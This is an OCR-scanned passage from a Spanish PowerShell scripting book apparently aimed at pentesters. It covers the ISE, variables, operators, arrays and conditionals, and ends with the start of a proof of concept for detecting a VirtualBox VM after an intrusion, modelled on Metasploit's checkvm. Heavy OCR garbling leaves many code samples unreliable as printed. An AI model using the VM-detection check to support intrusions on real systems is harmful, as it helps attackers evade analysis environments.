maquina  sc  debe  arrancar  la  linea  de  comandos  como  administrador. 


El  lichero  con  el  perfil  no  es  mas  que  una  serie  de  instrucciones  de  linea  de  comandos.  muy  similar  a 
los  perfiles  en  otras  shell.  Un  ejemplo  seria  el  siguiente  codigo  que  se  puede  visual  izar  a  continuacion. 

jjproftls.ps! 

=area  para  al- as  y  variables 

procesos  -value  get-process 
$ usuario  =  Senv: username 
?area  para  der'ir.iciOn  de  fund  ones 
-unction  bora  (get-date) 

function  prompt  {'PS  '  +  $  (get-location)  +  '  '  +  9  (date)  +'  > 


f otras  areas  utiles  para  el  usuario 
ttr.ensaje  de  bienvenida  al  ej  ecu  tar  la  shell 
user  =  (System. security .principal .Windowsidentityl : :GetCurrent ( ) 
write-host  Hola  $ ($user .name)  ,  bienvenido  a  PowerShell 


2.  Entorno  de  Scripting:  PowerShell  ISE 

PowerShell  ISEes  un  entomo  grafico  que  permitc  real  izar  desarrolio  de  scripts.  Presenta  un  debugger 
con  el  que  se  tacilita  la  manera  de  trabajar  con  PowerShell  y  la  automatizacion  de  tareas.  Esle 
entorno  se  encuemra  disponible  desde  la  version  2.0  de  PowerShell.  y  se  puede  encontrar  instalada 
por  defecto  desde  los  sistemas  Windows  7  y  Windows  Server  200S  R2. 

La  ruta  dbnde  se  encuentra  es  la  misma  que  donde  se  aloja  PowerShell ,  C: 1  Windows  system! 2 
Windows  PowerShellW  1.0.  Para  acceder  a  este  entorno: 

-  Se  puede  acceder  a  Inicio  >  Accesorios  >  Windows  PowerShell  >  Window's  PowerShell 
ISE. 

-  Escribiendo  directamentc  en  la  caja  de  busqueda.  es  decir,  en  Inicio  >  PowerShell  ISE. 

PowerShell  ISE  proporciona  ai  usuario  3  areas  diferenciadas  de  trabajo  integradas  en  una  unica 
ventana.  F.l  desarrollador  tiene  un  control  completo  sobre  lo  que  ocurre.  ademas  de  disponer  de  la 
ayuda  necesarias  sobre  todos  los  cmdlets  que  pueden  ser  ejecutados. 


Fig.  2.04:  Powers  fits  11  ISE . 
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El  area  superior,  por  defecto.  corresponde  con  un  editor  de  texto  en  el  cual  se  escribiran  los  script . 
Ademas,  mediante  el  intuitive  modelo  de  pesiahas,  famoso  en  los  navegadores.  se  dispone  de  la 
posibilidad  de  trabajar  con  distintos  script  a  la  vez. 

El  area  de  la  parte  inferior  se  corresponde  con  la  salida  por  pantalla  de  las  ejecuciones.  Ademas, 
el  usuario  puede  ir  probando  comandos  sobre  esta  consola,  aprovechando  los  valores  de  ciertas 
variables  en  un  momento  dado,  Esta  consola  es  de  gran  utilidad,  aunque  los  cambios  que  se  realicen 
en  los  providers,  como  por  ejemplo  en  el  provider  del  sistema  de  archives,  se  haran  en  realidad  en 
el  sistema. 

En  la  parte  derecha  de  PowerShell  1SE  se  puede  encontrar  la  ayuda  de  los  cmdlets  agrupados  por 
modulos  de  trabajo.  Los  modulos  de  trabajo  indican  distintas  herramientas  o  productos  de  Microsoft 
que  se  tienen  en  el  sistema.  De  esta  manera  es  muy  sencillo  saber  que  cmdlets  se  pueden  ejecutar  y 
obtener  una  ayuda  rapida.  Esta  funcionalidad  se  anadio  cn  la  version  3.0  de  PowerShell . 

F.l  concepto  de  ficha  en  PowerShell  viene  determinado  por  un  entomo  personalizado  con  sus 
variables,  alias,  funciones,  y  totalmente  aislado  del  resto  de  fichas.  Cuando  un  usuario  dispone  de 
una  ficha  en  PowerShell  1SE  donde  se  dispone  de  ciertas  variables  en  un  estado  concreto,  cuando 
comienza  a  trabajar  con  otra  ficha  desde  esta  no  se  ven  las  variables  de  la  anterior.  Se  puede  entender 
el  concepto  de  ficha  como  una  definicion  equivalente  a  los  ambitos  en  un  lenguaje  dc  programacion. 
Para  crear  una  nueva  ficha  se  puede  utilizar  un  atajo  como  es  CTRL  +  T  en  PowerShell  ISE. 


PS  C:\Users\bit  >  <i> 


Lin.  1  Col.  1  .  12 

Fig.  2. 05:  Fichas  en  Powers  hell  ISE . 

Las  fichas  locales  son  entomos  que  se  estan  ejecutando  sobre  la  misma  maquina  local  y  las  fichas 
remotas  son  entomos  que  son  ejecutados  en  otras  m&quinas  pero  su  presentacion  visual  se  dispone 


Po.v«rSrel.  1 


Powe'Snell  4  X 


|  Sin  titulo4  psl  X 

1 
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donde  el  usuario  se  encuentra.  Para  crear  una  ficha  remota  archivo  >  nueva  ficha  de  PowerShell  en 
remote  o  la  combinacion  CTRL  +  Mayus  +  R.  Se  pediran  credenciales  para  obtener  el  control  de  una 
sesioii  en  el  entomo  remoto  a  traves  de  PowerShell. 

La  ejecucion  de  los  scripts  y  la  depuracion  de  estos  es  algo  muy  importante  y  valioso.  H  istoricamcntc, 
en  un  entomo  de  scripting  no  sc  podia  debuggear  todo  lo  bien  que  se  necesita.  pero  esto  no  ocurre 
con  PowerShell  ISE.  La  ejecucion  de  los  scripts  se  produce  en  una  ficha  de  manera  controlada, 
llevandose  a  cabo  de  manera  complcta  o  linea  a  linea,  incluso  instruccion  a  instruccion,  ya  que 
pueden  existir  lineas  con  varias  instmcciones  concatenadas.  En  la  parte  superior  del  entomo  de 
debugging  se  encuentra  un  icono  de  play,  el  cual  permite  que  el  usuario  lance  el  script  que  se 
encuentre  activo  en  la  ventana. 

Archtvo  fd.-tar  Ver  Depurar  Ayuda 

_j  it  y  .i  □  x  - 1 '  t-  j.  ■  a  [ft  i 

I  Sm  titulol.psl'  |  5procesos.ps!  X  I  |  Ejecutar  script  (F5), 

Sarnies ds  Get-Process  sort  -Descending  id  Select-Object  -Last  5 


[Sprocesosl 


Fig.  2. 06  Ejecucion  dc  un  scrip!  con  Powers  he  U  ISE. 


Una  opcion  interesante  es  marcar  la  linea  o  conjunto  de  lineas  que  se  quieren  ejecutar  y  pulsar  sobre 
cl  atajo  de  teclado  F8,  o  bien  pulsar  sobre  el  boton  play  junto  al  icono  del  archivo.  Tal  y  como  puede 
visualizarse  en  la  imagen  esie  metodo  es  valioso  para  ejecutar  parte  de  lo  que  le  inlercse  al  usuario. 


Archivo  Editar  Ver  Depurar  Ayuda 

U  cS  tJ  4  ^  Ci  X  \-  l  lD 


3 


Ejecutar  seleccion 


an  (F8)  | 


ttulol.psl*  |  5procesos.ps!  X 

ISprocesos  Get-Process  sort  -Descending  id 

I  _ _ 

hig.  2.0? :  fjecucinn  \  elec  lira  dc  Uncos  o  instruccionts  en  Powers  he  I  I  ISE. 


write-host  powershell 

Sprocesos 


Select-Object  -Last  5 


Ianibien  puede  ser  interesante  ejecutar  solo  una  instruccion  y  no  la  linea  complcta.  por  lo  que  se 
deberia  sclcccionar  la  instruccion  hasta  antes  del  pipe,  en  el  caso  dc  ser  una  linea  concatenada  de 
comandos. 


Dtro  concepto  muy  interesante  que  debe  utilizar  el  desarrollador  son  los  breakpoint.  Un  breakpoint 
°  punl°  l*c  mPLira  es  una  parada  de  la  ejecucion  de  un  codigo  de  manera  intencionada  en  un  lugar 
concreto,  Se  pueden  colocar  varios  breakpoints  a  lo  largo  del  codigo,  con  cl  objetivo  de  ayudar  al 
i  csarrollacJor  a  depurar  su  codigo.  PowerShell  ISE  presenta  este  concepto,  de  manera  sencilla  e 
^  u,l,va-  En  el  menu  depurar  se  puede  colocar,  listary  eliminar  los  diferentes  puntos  de  ruptura  que 
puc  situar  a  lo  largo  del  codigo. 
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DeDurar  Ayuda  _  - . 

Pasc  a  case  por  prccedimientos 

FIG 

P35--  a  pass  por  Inst* uccior.es 

m 

Paso  a  pass  ps'a  salir 

Mayus-Fll 

Ejecutar  o  conti nuar 

F5 

Detener  depurador 

My/js-FS 

Alternar  punto  de  interrupcidn 

F9 

Quitar  todos  los  puntos  de  interrupcidn 
Habilitar  todos  los  puntos  de  interrupcion 

Deshabibtar  todos  !os  puntos  de  interruption 

Ctrl-Mayus+F9 

Mostrar  puntos  de  interrupcidn 

Ctrl- May  us+L 

h'ig.  2.0A:  Pantos  cie  rupluniQ  bimkpoint  en  Powershetf  fSt. 


3.  Variables 

Las  variables  son  porciones  de  memoria  que  almacenan  informacion  que  puede  verier  «m  el  tiempo. 
E„  PowerShell  no  nccesitan  ser  declaradas  previamente  para  poder  utd.zarlas,  por  lo ‘  "jjl 
senciHo  crcar  y  dar  valor  a  una  variable.  Lo  unico  que  se  debe  tener  en  cuenta  es  que  e  .ene  que  da 
Tnlbr, “a  variable  preeedid.  del  signo  S.  y  pos.erionaeme  udliaar  el  operate  -  par.  md« 
que  se  asignara  el  valor  indicado  a  la  derecha  del  operador. 

Las  variables  pueden  vend  preecdidas  por  m  lipo  de  too  y  de  esra  Om.  lorear  a  qoe  =1  eoateai* 
sea  de  un  tipo.  A  continuacion  se  muestra  un  ejempto  donde  se  crea  ‘  > 

valor  Svariable  =  "soy  un  texto". 

Otro  ejemplo  de  variable  con  tipo  de  datos  expheiio  sena  fmlj  $vm  table  -  10^ le  tip o  de :de 
puede  resultar  muy  util  para  controlar  los  t.pos  que  se  recogen  de 
ser  interesante  forzar  al  usuario  a  introducir  un  numero  por  leclado,  po.  ejemplo 
median te  un  menu  de  opciones. 

Las  variables  almacenan  objeros  y  despues  pueden  ser  trarada. .com. ^  te '»  te; “£?££■< 
creacion  y  asignacion  de  la  variable  se  requiere  ut.hzar  los  metodos  se  puede  P 

inv«ar  .'los  merodos.  Enel  siguieme  ejemplo  se  terra  como  aceede,  a  los  d, sun, os  me 

Svariable.  GetTvpeQ. 
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fuando  el  usuario  quiera  mostrar  el  valor  que  se  encuentra  almacenado  en  la  variable  se  puede 
utilizer  cl  cmdlet  Write-Output .  el  alias  echo  o  directamentc  indicando  la  variable  en  la  linea  de 
eomandos  precedida  del  caracter  $. 

Oiro  tipo  de  variables  son  las  predefinidas  y  son  aquellas  que  contienen  informacion  sobre  el  entomo 
jc  PowerShell  que  se  encuentra  cn  ejecucion.  Estas  variables  son  de  mucha  utilidad  cuando  se  estan 
escribiendo  scripts. 

Para  visualizar  las  distintas  variables  predefinidas  del  cnlorno  de  PowerShell  se  puede  utilizar  la 
instruccion  Is  variable:  Hay  que  recordar  que  las  variables  se  encuentran  cn  un  proveeclor  o  almacen. 
al  cual  se  puede  acceder  de  manera  seneilla  y  real  tear  un  tratamiento  de  sus  elementos. 


Variables  necesarias  en  el  desarrollo 

I  I  proveedor  de  variables  contiene  todas  las  variables  predefinidas  y  variables  creadas  por  el  usuario. 
i  xisten  variables  predefinidas  muy  interesantes  para  el  desarrollo  de  scripting .  proporcionando  al 
dcsarrollador  tiexibilidad.  informacion  y  gestion  de  errores  a  sus  scripts. 

\  continuacion  se  presentan  diversas  variables  predefinidas  y  que  son  necesarias  para  el  desarrollo 
do  scripts  en  PowerShell.  El  numero  de  argumentos  que  se  pasa  a  una  funcion  o  al  script  en  general, 
si  la  ultima  instruccion  se  ejecuto  correctamente  o  no  o  el  numero  de  proceso  que  identifica  cl 
proceso  de  PowerShell  son  algunas  de  las  variables  que  se  pueden  encontrar. 

(  on  csta  breve  descripcion  el  usuario  puede  hacersc  a  la  idea  de  lo  importante  que  puede  resultar  el 
uso  do  estc  tipo  de  variables. 


Variable 

Descripcion 

SArgs 

Esta  variable  contiene  una  lista  con  los  argumentos  pasados  a  una  funcion  o 
a  un  script  en  su  ejecucion 

$? 

Esta  variable  indica  si  la  ultima  instruccion  se  ejecuto  correctamente  o  no 

5A 

Esta  variable  indica  el  primer  miembro  del  ultimo  comando  tecleado  en  la 

linea  de  eomandos 

55 

Esta  variable  indica  el  ultimo  miembro  del  ultimo  comando  tecleado  en  la 

linea  de  eomandos 

SErmr 

Esta  variable  registra  los  errores  producidos  durante  la  ejecucion  de  la 

sesion 

SErmrl’icw 

Esta  variable  indica  el  formato  en  cl  que  se  mostraran  ios  errores 
registrados  en  S Error 

SI  tonic 

Variable  que  almacena  la  ruia  del  directorio  de  inicio  del  usuario 

IT^  sr>ui 

Variable  que  contiene  el  identificador  del  proceso  de  PowerShell 

Tab/a  2. 02:  Ejemplo ,v  de  variables  predefinidas 
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4.  Operadores 

Los  operadores  son  fundamentales  para  un  gran  tipo  de  operaciones.  Las  operacioncs  aritmettcas, 
de  comparacion.  mm.  mOm.  c«an  prasen.es  en  cualqnier  scrip,  ,..e  S«  .enga  q*  « 
PowerShell  aporta  un  gran  numero  de  operadores.  los  cuales  so  esludiaran  en  esle  aparlado  clasifieado 

por  categories. 


Operadores  aritmeticos 

Los  operadores  ari.mc.ieos  son  los  lipieos  quo  se  pueden  encon.rar  en  cualqmer  lenguaje  d, 
programacion.  PennUen  realtor  operaciones  matemi.icas  sobre  las  vanabto  En  I.  s,gu.en.«  .able 
e  p«de„  eneontrar  los  distin.os  operadores  disponibles  en  la  linea  de  eomandos  de  Powe, Shell. 


Operador 

Description 

Adicion/Suma 

• 

Sustraccion/Resta 

♦ 

Multiplicacion 

Division 

% 

Modulo/Resto 

Tabla  2.01  Operadores  aritmelieos. 


A  continuacidn  se  mucstra  un  codigo  sencillo  que  refleja  el  uso  de  un  switch,  que  es  una  estructojl 
condicional.  con  el  que  en  luncion  del  operador  indicado  se  realiza  una  operac.on  u  otra.  El  cod.pl 
presentado  implementa  una  calculadora  basica.  cuyo  script  rec.be  3  argumentos.  F.l  pnmero  *  l«l 
argumentos  es  el  operando  1  el  segundo  es  el  operador  y  el  tereero  el  operando  2.  En  lune.ondell 
valor  del  argumento  2  se  realiza  una  operacion  u  otia. 


switch  ($Args  lj  )  { 

+  { $Args  fO]  *  $Axgs[2]  :  break' 

-  iSArgslOl  -  $Args[21  ;  break) 

♦  { SArgs [0]  *  $Argsl2)  ;  break- 

/  i $Args  f 0 1  /  $Argsl2]  ;  break) 

;  )$Args[01  i  $ArgsI2]  ;  break) 

default  { echo  "Operador  incot recto" 

I 


;  break) 


Operadores  de  comparacion  I 

La  comparacion  emre  operandos  «,  algo  comun  on  cl  dcsarrollo  dc  «  j„.  geslionando  d.s.»| 
caminos  que  se  puede  tomar  en  un  codigo  en  un  instante  concrete.  Se  pue  e  compar ar  ri 

de  valores,  por  ejemplo  cadcnas  de  texto  o  numeros. 

A  continuacidn  se  puede  ver  los  distintos  operadores  que  la  linea  de  eomandos  de  Pmtedj® 
proporciona  al  usuario. 
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Operador 

Descripcion 

- ne 

Compara  si  los  valores  no  son  iguales 

-eq 

Compara  si  los  valores  son  iguales 

-gr 

Compara  si  un  valor  es  estrictamente  mayor  que  el  otro 

Compara  si  un  valor  es  mayor  o  igual  que  el  otro 

-it 

Compara  si  un  valor  es  menor  que  el  otro 

-le 

Compara  si  un  valor  es  menor  o  igual  que  el  otro 

labia  2.04:  Operadores  de  comparacion. 


).;i  simiicnte  codigo  muestra  dos  argumentos  que  son  pasados  a  un  script  y  se  realiza  una  comparacion 
dc  igualdad  para  comprobar  si  son  iguales.  En  el  caso  de  ser  iguales  se  ejecuta  una  o  un  bloque  de 
instrucciones,  mientras  que  si  no  son  iguales  se  ejecuta  otro  bloque  de  instrucciones. 

(  Sargs [0 J  -eq  Sargs[I]  ) 

(ech<  "Sen  iguales'') 

iechr  son  iguales") 

Oiros  comparadores  que  pueden  ser  utilizados  son  los  gencricos  y  de  expresiones  regu lares.  El 
parameiro  match  permite  ejecutar  expresiones  regulares.  las  cuales  son  realmente  utiles  en  temas 
web.  por  ejemplo.  La  siguiente  instruccion  Hacking  ’  match  'h[a-z]  ’  devolvera  true  en  el  valor  de 
la  comparacion  o  cl  matching. 

I  os  operadores  de  comparacion  genericos  permiten  comparar  cadcnas  de  texto  con  una  expresion 
gcncrica.  Existen  2  parametros  like  y  notlike.  FI  primero  es  para  comprobar  la  igualdad  de  la 
comparacion  y  el  segundo  la  desigualdad.  Un  ejemplo  es  pah/o'  -/ike  'pah*  FI  ejemplo  devuelve 
true  cn  la  comparacion 


Operadores  logicos 

l.os  operadores  logicos  son  elementos  fundamentales  en  el  desarrollo  debido  a  que  permiten 
concatcnar  o  pro  fund  izar  en  ciertas  condiciones  y  comparaciones.  A  continuacion  se  presenta  una 
tabla  con  los  operadores  logicos  que  pueden  ser  encontrados  en  la  linea  de  eomandos  de  PowerShell . 


Operador 

Descripcion 

-and 

Y  Logico 

- or 

0  Logico 

- not 

No  Logico 

! 

No  Logico 

-xor 

0  Exclusivo 

Table  2.05  :  Operadores  logicos. 
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El  siguiente  cddigo  muestra  un  ejemplo  sencillo  en  el  que  para  poder  ejecutar  un  bloque  de 
instrucciones  se  puede  dar  una  de  las  dos  condiciones  o  ambas.  Para  indicar  estc  se  juntan  as  dos 
condiciones  con  el  operador  OR.  Gracias  a  este  operador  con  que  ocurra  una  de  las  cosas  valdna 
para  ejecutar  el  bloque  de  instrucciones. 

if  ((  $args. Count  -eq  i  )  -or  (  $args. Count  -eq  3  )) 
echo  "Numero  de  parametros  correctos" 

) 

else 

echo  " . /ccmpararLogico.psi  <argumentol>  [  <arg2>  <ara3>  ] 
exit: 

1 

Operadores  de  tipo 

Este  operador  permite  verificar  si  una  variable  es  de  un  tipo  o  no.  Puede  ser  interesante  verificar  si 
una  variable  es  de  un  tipo  antes  de  asignar  un  variable.  El  operador  evalua  la  variable  es  de  un  tipo 
indicando  live  o  false.  Se  dispone  del  parametro  is  e  isnot  para  verificar  el  tipo. 

if  (  SArgs [0]  -is  1  tfttj  ) 

I 

$raivar  =  SArgs 10] 
echo  "Er.tero” 
f 

else 

„ 

echo  "No  es  un  entero 

) 

Operadores  de  intervalo 

Este  tipo  de  operador  permite  represenlar  los  valores  que  hay  entre  un  valor  imcial  v  otro  valor  final.  I 
Se  representa  con  2  puntos  Un  ejemplo  de  operador  de  intervalo  es  cl  que  puede  verse  en  el 

siguiente  codigo. 

$ valor  Ini  ~  2  | 

$valorFinai  =  11 

Sva*  crlr.i  .  .  $valorFina] 


5.  Arrays  y  hash  tables 


Un  army  es  una  coleccion  de  elemenlos.  Tradicionalmenlc.  los  arrays  han  sido  defimdos  como  uru 
coleccion  de  elemenlos  homogeneos,  pero  cn  PowerShel!  no  liene  porque  ser  asi.  Se  pue  en  t  . 
arrays  con  elemenlos  de  distinlos  tipos. 


Los  arrays  tambien  son  conocidos  como  tablas  en  PowerShel l 
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Las  dimensiones  de  los  arrays 

Las  dimensiones  en  un  array  indican  el  espacio  donde  se  pueden  coiocar  y  referenciar  los  elementos. 
En  otras  palabras,  la  dimension  se  especifica  a  la  hora  de  la  declaracion  del  array.  La  dimension 
puede  ser  un  valor  N.  la  cual  sera  representada  mediante  el  uso  de  corchetes.  Los  indices  de  un  array 
empiczan  por  0,  como  ocurre  en  lenguajes  como  C\  y  no  por  1 . 

1  lav  distintas  maneras  de  declarar  un  array .  en  una  se  necesita  especificar  la  dimension  el  array 
v  en  otra  basta  con  declarar  una  variable  y  asignar  valores  de  un  tipo.  Por  otro  lado  si  se  requiere 
especificar  un  array  de  varias  dimensiones  se  debe  especificar  el  numero  de  dimensiones  mediante 
el  uso  de  corchetes.  A  continuacion  se  muestra  codigo  de  ejemplo  que  sirve  para  declarar  y  utilizar 
arrays. 

int  i  1  ]  SiniArray  =  22,  12,1986 
;:i,iArray2  =  1983,1986,1987 
:u.tU  ni$miArray3  =  9  (  (14, 22, 2008) ,  (1,  2,  3)  ) 

;:nultiIipo  (int]  1,  [double]  9.5 
iTipo 

Tratamiento  de  datos 

Insertar  elementos  en  un  array’  es  uno  dc  los  pasos  importantes  en  el  uso  de  estc  tipo  de  estructuras 
de  datos.  Bn  PowerShel/  se  puede  insertar  elementos  dentro  de  un  array  de  manera  seticilla,  y 
similar  a  oiros  lenguajes  de  programacion.  £1  uso  del  operador  k  pennite  anadir  un  elemento  a  un 
array  cuando  este  tiene  una  dimension.  Como  ejemplo  se  presents  la  siguiente  instruccion  $mi Array 
♦  =  22.14. 

C  uando  se  dispone  de  un  array  con  varias  dimensiones  hay  que  indicar  a  que  fila  se  quiere  anadir  cl 
elemento.  Como  ejemplo  se  presenta  la  siguiente  instruccion  $miArray3[0]  -t-=  Ccu((2()/2)).  Tambien 
se  puede  requerir  en  un  momento  dado  la  insercion  de  una  nueva  fila  para  ello  se  debe  utilizar  el 
operador  •+=*  como  si  se  anadiese  un  elemento  sobre  una  fila  ya  existente. 

Sfr.iArray.?  9  (  (15,  9,2009)  ) 

5midrray3 

14 
22 

2008 

1 

2 
3 

15 
9 

2009 


Para  leer  los  valores  de  un  array  se  debe  especificar  mediante  corchete  la  posicion  o  posiciones  que 
K  ^icrcn  recuperar. 

**larray 
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o 

1 

3 

$j?,i  array  [0] 

0 

Smiarray [ D . . $miarray . Length] 
0 


$miarray3 [01 [2] 

2008 

Leer  la  information  de  un  array  es  importinte.  sobre  todo  si  date  ticae  varias  dimensiones.  El  prime, 
core  here  es  la  Hla.  mienlas  que  el  seguadt,  cs  la  columna.  Cuando  se  dispone..  de  mas  dimension 
“  van  anexando  los  corche.es  con  el  fin  de  referenda,  al  reslo  de  valores.  Como  ejemplo  s  piopon, 
ana  variable  farm'  con  2  dimensioncs.  Al  inicializar  el  array  se  crearon  Idas  con  3  clememos. 
po  lo  one  para  refercneiarlas  se  a, ilia,  en  el  corche.e  los  valores  0  ,  For  olio  lado.  cl  corched 
Z  leprcsenta  la  column,  puede  .onra,  los  valores  0.1  y  2.  Para  la  meditation  de  valores  se  puedr 
SSel  melodo  Sc. li, fee  o  direclameme  como  se  realize  en  algnnos  lengnajes  de  programacoa. 

SArrayLCI  '  2000 
$tabla  «  22,14,2014 
$tabla . SetVa) ue (10,0) 

$tabla 

10 

14 

2014 

Si  se  quiere  Ucvar  a  cabo  la  eliminacibn  de  un  elemento  de  un  array  se  puede  utilizar  la  opcion 
de  sobrescribir  dieha  variable  o  elememo.  MM  no  dis^ne  de  un  merndo  p«a  ehmi- 
elcmen, os.  A  eontinuacibn  sc  mneslra  un  ejemplo  para  llcvar  a  cabo  eslo  SJr  ,<n  -  MmmffU  ♦# 

Tablas  hash 

Las  tablas  hash  o  tablas  asociativas  tambien  estan  dispenses  como  estructura  de  dates  en 
PowerShell.  Las  tablas  hash  se  diferencian  de  los  array  en  que  los  valores  se  ie  eienuan  ™ 
una  clave  en  luear  de  un  indice.  Sc  debe  tener  en  cuenta  que  como  ocurre  con  los  an  ay  usuan 
puede  utilizar  tipos  de  dates  heterogeneos.  A  eontinuacibn  se  muestra  un  codigo  donde  se f  creau^ 
variable  de  tipo  hash  y  se  inicializa  con  valores  con  el  tonnato  clave,  valor.  a>  que  e  e 
que  si  cl  hash  o  clave  dispone  de  cspacios  hay  que  referenc.arlo  entre  com.llas  simples. 


$  Lab_  aHas  r. 
StablaHash 
Name 


3-hashl  =  22;  hash2  1996) 


Value 


hash2 

hashl 

$tablaliash \  'hashl'  3 
22 


6.  Los  cmdlet  de  salida 

l  a  redireccion  a  fichcros  y  a  otros  eiementos  es  algo  importante  en  el  scripting .  La  linea  de  comandos 
je  PowerShell proporciona  al  usuario  la  via  para  controlar  la  salida  de  datos.  Los  cmcflets  encargados 
jc  controlar  la  salida  de  datos  transforman  eslos  en  algun  tipo  de  texto. 

los  cntdlets  comienzan  por  el  verbo  Out  y  despues  del  guion  el  nonibre  hacia  donde  envian  la 
informacion.  El  primer  cmdlet  que  se  explica  es  el  de  Out-Host,  el  cual  envia  datos  hacia  fuera  de 
PowerShell.  En  el  siguiente  ejemplo  se  muestra  un  listado  dc  scrvicios  que  son  tratados  por  Out - 
post.  C  on  el  parametro  - paging ,  el  propio  cmdlet  va  a  paginar  la  informacion  para  que  sea  comoda 
su  Icctura. 


S  C:\Users\pablo>  Get-Service  I  Out-Host  -Paging 


B 


topped 

topped 

topped 

unning 

topped 

topped 

unning 

unning 

topped 

ESPACI0> 


AeLookupSvc 

ALG 

AppIDSvc 
Appinf o 
AppMgmt 
aspnet_state 
Audio Endpo intBu . . . 
AudioSrv 
AxAutoMntSrv 
pagina  siguiente; 


DisplayNane 

Experiencia  con  aplicaciones 
Servicio  de  puerta  de  enlace  de  niv- 
Identidad  de  aplicacion 
Infornacion  de  la  aplicacion 
Adninistracion  de  aplicaciones 
ASP-NET  State  Service 
Conpilador  de  extreno  de  audio  de  W- 
Audio  de  Windows 

Alcohol  Uirtual  Drive  Auto-nount  Se. 
<RET0RN0>  linea  siguiente;  Q  salir 


Fig.  2.09:  Paginat  ion  de  salida  con  ct  cmdlet  Out-! lost. 


1 1  mullet  Out- Null  liene  un  comportamiento  similar  a  /dev/nulL  el  cual  en  sistemas  Linux  represent  an 
a  un  perilerico  nulo.  Este  cmdlet  no  evila  que  los  mensajes  de  error  se  muestren  por  pantalla.  Este 
mullet  se  ha  disenado  con  el  fin  de  descargar  cualquier  entrada  que  se  reciba.  por  lo  que  si  se  ejecuia 
la  instruccion  Get-Process  |  Out-Null,  no  se  mostrara  nada  por  pantalla. 

I  I  c  millet  Out-Printer  permile  al  usuario  utilizar  la  impresora  predeterm i nada.  Se  puede  utilizar  otro 
tipo  de  impresora  especificando  cl  nombre  de  esta.  Un  ejemplo  dc  ejecucion  seria  Get-Process  Out- 
Prmtcr  Name  “ Microsoft  Office  Document  Image  Writer". 

I  I  mullet  Out-File  permite  enviar  el  resultado  dc  la  ejecucion  de  los  comandos  a  un  archivo.  Poi 
ejemplo,  sc  puede  ejecutar  la  siguiente  instruccion  Ge f -Process  Out-File  -FilePath  <ruta  del 
anhiva> .  Es  conveniente  utilizar  los  cmdlets  Format-*  para  preparar  la  salida  como  mas  interese  al 
usuario.  Adcmas.  otra  de  las  cosas  a  tener  en  cuenta  es  que  Out-File  crea  un  archivo  con  encoding 
dc  Unicode.  Con  el  parametro  Encoding  se  puede  modifiear  este  comportamiento  por  defecto 
mdicando  el  encoding  en  el  que  se  quiere  el  fichero  resultante. 


7.Condicionales 

furK|U)n^*^°na^CS  Perrn'*en  bifurcar  la  ejecucion  del  script  cn  funcion  de  unas  condiciones.  En 
,on  *as  comentadas  condiciones  el  script  puede  tomar  un  cam i no  u  otro  en  su  ejecucion. 


L 
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dependiendo  de  si  una  o  varias  condiciones  son  ciertas  o  no.  Las  estructuras  condiciones  son  la  base 
para  el  desarrollo  de  scripts,  y  en  general  de  cualquier  lenguaje  de  programacion. 


La  sentencia  If  . 

La  sintaxis  de  la  sentencia  i/cs  realmente  sencillay  muy  intuitiva.  ya  que  por  lo  general  es  similar  en 
todosTos  Uuajes  de  programacion.  y  ademas.  es  similar  a  c6mo  actua  el  ser  humano  ante  ciertas 
circunstancias.  A  continuacion  se  muestra  un  pequeno  ejemplo  en  pseudocodigo. 

Si  condicion 

Bloqne  de  instrucciones  A 

Si  No 


Bluque  de  instrucciones  B 

Fin  Si 


mender  mejor  el  tactaamiemo  del  eondicional  se  present  el  sigaieme  <0=mplo  donde 
usuario  pide  ■  olro  que  imroduzca  un  0  o  I .  Si  el  usuario  introduce  un  1  tiabra  acenado  cl  valor  qu. 

el  otro  usuario  habia  pensado. 


Write-Host  Introduce  un  valor  entre  0  y  1 
$00 : ion  -  Head- Host 

If  (  ($opcion  -ne  .1)  -and  (Sopcion  0)) 

Wr.te-Ilost  So  has  intxoflucido  un  valor  entre  0  y  1 
Exit: 


l 

£lsslt (Sopcion  eq  1) 

Write-Kost  Has  adivin&do  el  numero 

) 

E 1  se 

Write-Host  No  has  adivinado  el  numero 


1 


El  eondicional  de  seleccion:  Switch 

El  conditional  de  selcccion  switch  optimiza  la  implementacion  de  la  estructimij/  cr ^a  g 
escenarios.  Esta  sentencia  es  sencilla  y  muy  flexible  que  pcnu.te  agrupar  vanos  bloquis 
instrucciones  bajo  una  expresion  concreta  y  sencilla.  I 

La  sintaxis  que  presenta  switch  es  intuitiva  y  facil  de  recordar  como  se  puedc  visualizar  en  | 
siguiente  ejemplo  en  pseudocodigo.  traduciendo  switch  a  en  caso  ile  . 


En  caso  de  variable 

Valor  1  Bloqne  Instrucciones  1 
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Valor2  Bloqne  Instrucciones  2 


ValorN  Bloqne  Instrucciones  N 
Defecto  Bluque  Instrucciones  Defecto 
[•in  En  caso  de 


\  continuacion  se  propone  un  ejemplo  basico  de  creation  de  un  menu  para  un  script.  Este  menu 
mostrara  las  posibilidades  que  el  usuario  puede  ejecutar  en  el  script  y  solicitara  a  este  que  introduzca 
una  opcion.  Cuando  el  usuario  introduce  una  opcion  concreta.  el  eondicional  switch  ejecutara  un 
bloque  de  instrucciones  en  funcion  de  la  opcion  elegida. 

Write-Host  Menu 
Wr:te-Host 

W: : te-Host  "U  Listar  directorio  " 

Write-Host  "2)  Dar  la  hora" 

Write-Host  "i)  ir 

Write-Host  "Introduce  le  opcidn:" 

:  I  cion  Read-Host 
witch (Sopcion) 


*  Ks;break1 
.  ! date; break | 

;  {exit;break| 
iL* fault  (break } 


PoC:  Check V Box 

I  n  algunas  ocasiones  el  pentester.  tras  rcalizar  la  intrusion,  se  encuentra  en  una  maquina  virtual. 
I.stc  hccho  es  interesante  tenerlo  controlado,  por  ello  en  Metasploit  existe  un  modulo  denominado 
chcckvm.rh .  Este  script  de  Mcterpreter  indica  si  la  sesion  se  esta  ejecutando  en  algun  tipo  de  maquina 
virtual,  ya  sea  VMIVare.  Virtual  Box ,  Virtual  PC.  Hyper-  V,  OEtnu,  etcetera. 

I  n  esta  prueba  de  eoncepto  se  va  a  implemenlar  una  parte  de  dicho  script  con  el  objetivo  de  identificar 
%l  cl  entomo  al  que  accedio  el  pentester  es  una  maquina  virtual.  En  este  caso  se  va  a  evaluar  si  el 
entomo  perteneee  a  una  maquina  virtual  corriendo  en  Virtual  Box. 

A  continuacion  se  muestra  (a  funcion  implementada.  en  ella  se  puede  ver  di  ferentes  formas,  que  hay 

qvic  evaluar,  para  detectar  si  el  sistema  operative  esta  siendo  ejccutado  cn  una  maquina  virtual  de 
Virtual  Box. 


junction  checkvbox 
Svbox  -  Sfalse 

ToLnw  *  Process  I  (  if  ((£_. name. ToLower 0  .Equals ("vboxservice") ) -or ($  .name. 
